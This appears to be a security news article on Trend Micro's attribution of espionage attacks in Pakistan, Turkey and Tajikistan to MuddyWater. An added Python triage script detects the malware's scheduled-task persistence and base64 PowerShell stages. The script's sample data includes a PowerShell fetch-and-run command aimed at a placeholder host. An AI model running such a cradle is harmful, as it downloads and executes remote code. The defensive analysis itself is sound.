Security researchers at Trend Micro link recent cyber espionage attacks against organizations in Pakistan, Turkey, and Tajikistan to older MuddyWater campaigns.
Earlier MuddyWater campaigns caused considerable confusion, making them difficult to attribute to a specific threat actor. However, the experts showed that artifacts associated with MuddyWater had been used in attacks against the Saudi Arabian government, in assaults linked to a single attack framework, and in incidents attributed to the FIN7 hacking group.
Given the targeted organizations and the focus on gathering information and uploading it to the command and control (C&C) servers, Trend Micro assesses that the threat actors behind the attacks are mainly focused on espionage.
The most recent attacks involve numerous links to the previously observed MuddyWater campaigns and show that “the attackers are not merely interested in a one-off campaign, but will likely continue to perform cyberespionage activities against the targeted countries and industries,” the experts state.
The similarities to previous MuddyWater campaigns include the focus on Middle Eastern targets, the use of documents that mimic government organizations, the dropping of a Visual Basic script file and a PowerShell file (the VBS executes the PowerShell script), and the use of numerous hacked websites as proxies. The attacks also show similar obfuscation processes and similar internal variables after deobfuscation.
The malicious documents, which target individuals working for government organizations and telecommunication companies in Tajikistan, use social engineering to trick victims into enabling macros. Some of the payloads were embedded in the document itself, while others were downloaded from the Internet.
Once the macros are enabled, the Visual Basic script and PowerShell script, both obfuscated, are dropped in the ProgramData directory. Then, a scheduled task is created with the path to the VBS script to ensure persistence.
In other attacks, the second dropped file is a base64-encoded text file that decodes to the PowerShell script. Another campaign drops three files: an .sct scriptlet file, an .inf file, and a base64-encoded data file. The first two use publicly available code to bypass AppLocker.
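To make the persistence and staging chain in the two paragraphs above concrete for a responder, here is an added triage script; it is not Trend Micro's code, nor code from the malware. It parses a scheduled task export in the Task Scheduler XML schema, flags Exec actions whose command line points at a .vbs under ProgramData, and decodes a base64 text file to check whether the result looks like PowerShell. The task XML, file names, paths, URL and payload are constructed samples, not indicators from the report.

```python
"""Triage helpers for the dropper chain described above: a scheduled task that
runs a .vbs under ProgramData, next to a base64-encoded text file that decodes
to PowerShell. Added example; the samples below are constructed, not IOCs."""
import base64
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML exports (schtasks /query /xml).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# A .vbs anywhere under ProgramData (drive-qualified or via %ProgramData%).
VBS_UNDER_PROGRAMDATA = re.compile(
    r"(?:%ProgramData%|ProgramData)\\[^\s\"']*\.vbs\b", re.IGNORECASE)

# Rough markers that a decoded blob is PowerShell rather than arbitrary text.
PS_MARKERS = re.compile(
    r"\$\w+\s*=|Invoke-Expression|\bIEX\b|New-Object|\[char\]", re.IGNORECASE)

# Constructed task export mimicking the persistence described in the article.
# The path and file name are hypothetical.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>C:\ProgramData\Update\update.vbs</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\cmd.exe</Command>
      <Arguments>/c echo maintenance</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed stand-ins for the dropped base64 text file (hypothetical URL).
# On a real host you would read the dropped file instead of encoding here.
SAMPLE_STAGE_TEXT = "$u = 'http://example.invalid/gate'; IEX (New-Object Net.WebClient).DownloadString($u)"
SAMPLE_STAGE_B64 = base64.b64encode(SAMPLE_STAGE_TEXT.encode("utf-8")).decode()
SAMPLE_STAGE_B64_UTF16 = base64.b64encode(SAMPLE_STAGE_TEXT.encode("utf-16-le")).decode()


def flag_task_actions(task_xml):
    """Return (command, arguments) for every Exec action whose command line
    references a .vbs under ProgramData, the persistence pattern above."""
    root = ET.fromstring(task_xml)
    hits = []
    for exec_node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        if VBS_UNDER_PROGRAMDATA.search(cmd + " " + args):
            hits.append((cmd, args))
    return hits


def decode_stage(b64_text):
    """Decode a base64 text file and report whether the result looks like
    PowerShell. Returns (decoded_text, looks_like_powershell); invalid base64
    or undecodable bytes yield ("", False)."""
    try:
        raw = base64.b64decode("".join(b64_text.split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "", False
    try:
        # PowerShell droppers often write UTF-16LE; NUL bytes give it away.
        decoded = raw.decode("utf-16-le") if b"\x00" in raw[:64] else raw.decode("utf-8")
    except UnicodeDecodeError:
        return "", False
    return decoded, bool(PS_MARKERS.search(decoded))


def triage(task_xml, stage_b64):
    """Combine both checks into one finding list a responder can act on."""
    findings = []
    for cmd, args in flag_task_actions(task_xml):
        findings.append(f"task runs VBS under ProgramData: {cmd} {args}")
    decoded, is_ps = decode_stage(stage_b64)
    if is_ps:
        findings.append(f"base64 file decodes to PowerShell: {decoded[:60]}...")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_TASK_XML, SAMPLE_STAGE_B64):
        print(line)
```

On a live host, feed `flag_task_actions` the output of `schtasks /query /xml /tn <name>` for each task, and `decode_stage` the contents of any text file in ProgramData that is pure base64; the UTF-16LE branch matters because the decoded stage is otherwise easy to miss when grepping for PowerShell keywords.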
The PowerShell script is divided into three parts: one contains global variables (paths, encryption keys, a list of gates and hacked websites used as proxies), the second contains functions related to standard RSA encryption, and the third contains a backdoor function.
The backdoor collects machine information, takes screenshots, and sends all data to the C&C. It also includes support for commands such as clean (attempts to delete all items from drives C, D, E, and F), reboot, shutdown, screenshot, and upload. Communication with the C&C is performed via XML messages.
If an improper request is sent to the C&C server, it replies with the message 'Stop!!! I Kill You Researcher.' This kind of personalized message suggests that the attackers monitor the data going to and from their C&C server.
Trend Micro also explains that if communication with the C&C fails and the PowerShell script is run from a command line, error messages written in Simplified Chinese are displayed. These messages read as machine-translated rather than written by a native speaker.